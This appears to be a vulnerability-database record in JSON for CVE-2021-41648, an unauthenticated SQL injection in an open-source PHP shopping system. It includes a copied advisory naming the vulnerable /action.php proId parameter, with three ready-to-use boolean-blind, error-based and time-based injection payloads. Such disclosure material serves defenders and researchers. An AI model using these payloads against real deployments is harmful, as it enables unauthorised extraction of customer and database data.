DATABASE RESOURCES PRICING ABOUT US

{"id": "06F36F60-CEBE-5A2E-83E4-99231A72D486", "vendorId": null, "type": "githubexploit", "bulletinFamily": "exploit", "title": "Exploit for SQL Injection in Online-Shopping-System-Advanced Project Online-Shopping-System-Advanced", "description": "# CVE-2021-41648\n\nCVE-2021-41648 SQL Injection in online-shoppin...", "published": "2021-09-30T06:16:30", "modified": "2021-10-01T13:50:36", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "href": "", "reporter": "", "references": [], "cvelist": ["CVE-2021-41648"], "immutableFields": [], "lastseen": "2021-12-10T15:39:17", "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-41648"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165036"]}, {"type": "zdt", "idList": ["1337DAY-ID-37061"]}], "rev": 4}, "score": {"value": 3.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-41648"]}, {"type": "kitploit", "idList": ["KITPLOIT:3449843613571411531", "KITPLOIT:516609842825105845"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165036"]}, {"type": "threatpost", "idList": ["THREATPOST:99DC4B497599503D640FDFD9A2DC5FA3"]}, {"type": "zdt", "idList": ["1337DAY-ID-37061"]}]}, "exploitation": null, "vulnersScore": 3.9}, "_state": {"dependencies": 1646236489}, "privateArea": 1}

{"packetstorm": [{"lastseen": "2021-11-22T18:01:25", "description": "", "cvss3": {}, "published": "2021-11-20T00:00:00", "type": "packetstorm", "title": "PuneethReddyHC Online Shopping System Advanced 1.0 SQL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-41648"], "modified": "2021-11-20T00:00:00", "id": "PACKETSTORM:165036", "href": "https://packetstormsecurity.com/files/165036/PuneethReddyHC-Online-Shopping-System-Advanced-1.0-SQL-Injection.html", "sourceData": "`# CVE-2021-41648 \n \nCVE-2021-41648 SQL Injection in online-shopping-system \n \nThe online-shopping-system is vulnerable to un-authenticated error/boolean-based blind & error based SQL Injection attacks. <br/><br/> \nThe proId parameter on the /action.php page does not sanitize the user input, an attacker can extract sensisitive data from the underlying MySQL Database. \n \n## Link To Application \n[online-shopping-system](https://awesomeopensource.com/project/PuneethReddyHC/online-shopping-system) \n \n## Affected Components & Parameter \nURL: **/action.php** \nPARAMETER: **proId** \n \n## Poc's \n \n### SQLMAP PAYLOADS<br/> \n \n### proId parameter on the /action.php page \nParameter: proId (POST) \nType: boolean-based blind \nTitle: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment) \nPayload: `proId=61 OR 17-7=10' OR NOT 4774=4774#&addToCart=1` \n \nType: error-based \nTitle: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) \nPayload: `proId=61 OR 17-7=10' OR (SELECT 6869 FROM(SELECT COUNT(*),CONCAT(0x717a716271,(SELECT (ELT(6869=6869,1))),0x716a627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- gfTu&addToCart=1` \n \nType: time-based blind \nTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP) \nPayload: `proId=61 OR 17-7=10' AND (SELECT 2990 FROM (SELECT(SLEEP(5)))YhWy)-- xWNo&addToCart=1`</br></br> \n \n### If the POC Image is unclear, please click on the GIF which will load in a better resolution. \n \n \n \n## Discovered by \nJason Colyvas \n[MOBIUSBINARY](https://mobiusbinary.com) \nSeptember 21st, 2021 \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/165036/prhcossa10-sql.txt", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "zdt": [{"lastseen": "2021-12-04T15:48:03", "description": "PuneethReddyHC Online Shopping System Advanced version 1.0 suffers from a remote SQL injection vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-11-22T00:00:00", "type": "zdt", "title": "PuneethReddyHC Online Shopping System Advanced 1.0 SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41648"], "modified": "2021-11-22T00:00:00", "id": "1337DAY-ID-37061", "href": "https://0day.today/exploit/description/37061", "sourceData": "# CVE-2021-41648\n\nCVE-2021-41648 SQL Injection in online-shopping-system\n\nThe online-shopping-system is vulnerable to un-authenticated error/boolean-based blind & error based SQL Injection attacks. <br/><br/>\nThe proId parameter on the /action.php page does not sanitize the user input, an attacker can extract sensisitive data from the underlying MySQL Database. \n\n## Link To Application\n[online-shopping-system](https://awesomeopensource.com/project/PuneethReddyHC/online-shopping-system)\n\n## Affected Components & Parameter\nURL: **/action.php** \nPARAMETER: **proId**\n\n## Poc's\n\n### SQLMAP PAYLOADS<br/>\n\n### proId parameter on the /action.php page\nParameter: proId (POST)\nType: boolean-based blind\nTitle: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)\nPayload: `proId=61 OR 17-7=10' OR NOT 4774=4774#&addToCart=1`\n\nType: error-based\nTitle: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)\nPayload: `proId=61 OR 17-7=10' OR (SELECT 6869 FROM(SELECT COUNT(*),CONCAT(0x717a716271,(SELECT (ELT(6869=6869,1))),0x716a627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- gfTu&addToCart=1`\n\nType: time-based blind\nTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\nPayload: `proId=61 OR 17-7=10' AND (SELECT 2990 FROM (SELECT(SLEEP(5)))YhWy)-- xWNo&addToCart=1`</br></br>\n\n### If the POC Image is unclear, please click on the GIF which will load in a better resolution.\n\n \n\n## Discovered by\nJason Colyvas \n[MOBIUSBINARY](https://mobiusbinary.com) \nSeptember 21st, 2021\n", "sourceHref": "https://0day.today/exploit/37061", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2022-03-23T19:21:36", "description": "An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /action.php prId parameter. Using a post request does not sanitize the user input.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-01T14:15:00", "type": "cve", "title": "CVE-2021-41648", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41648"], "modified": "2021-11-26T13:55:00", "cpe": ["cpe:/a:online-shopping-system-advanced_project:online-shopping-system-advanced:-"], "id": "CVE-2021-41648", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-41648", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:online-shopping-system-advanced_project:online-shopping-system-advanced:-:*:*:*:*:*:*:*"]}]}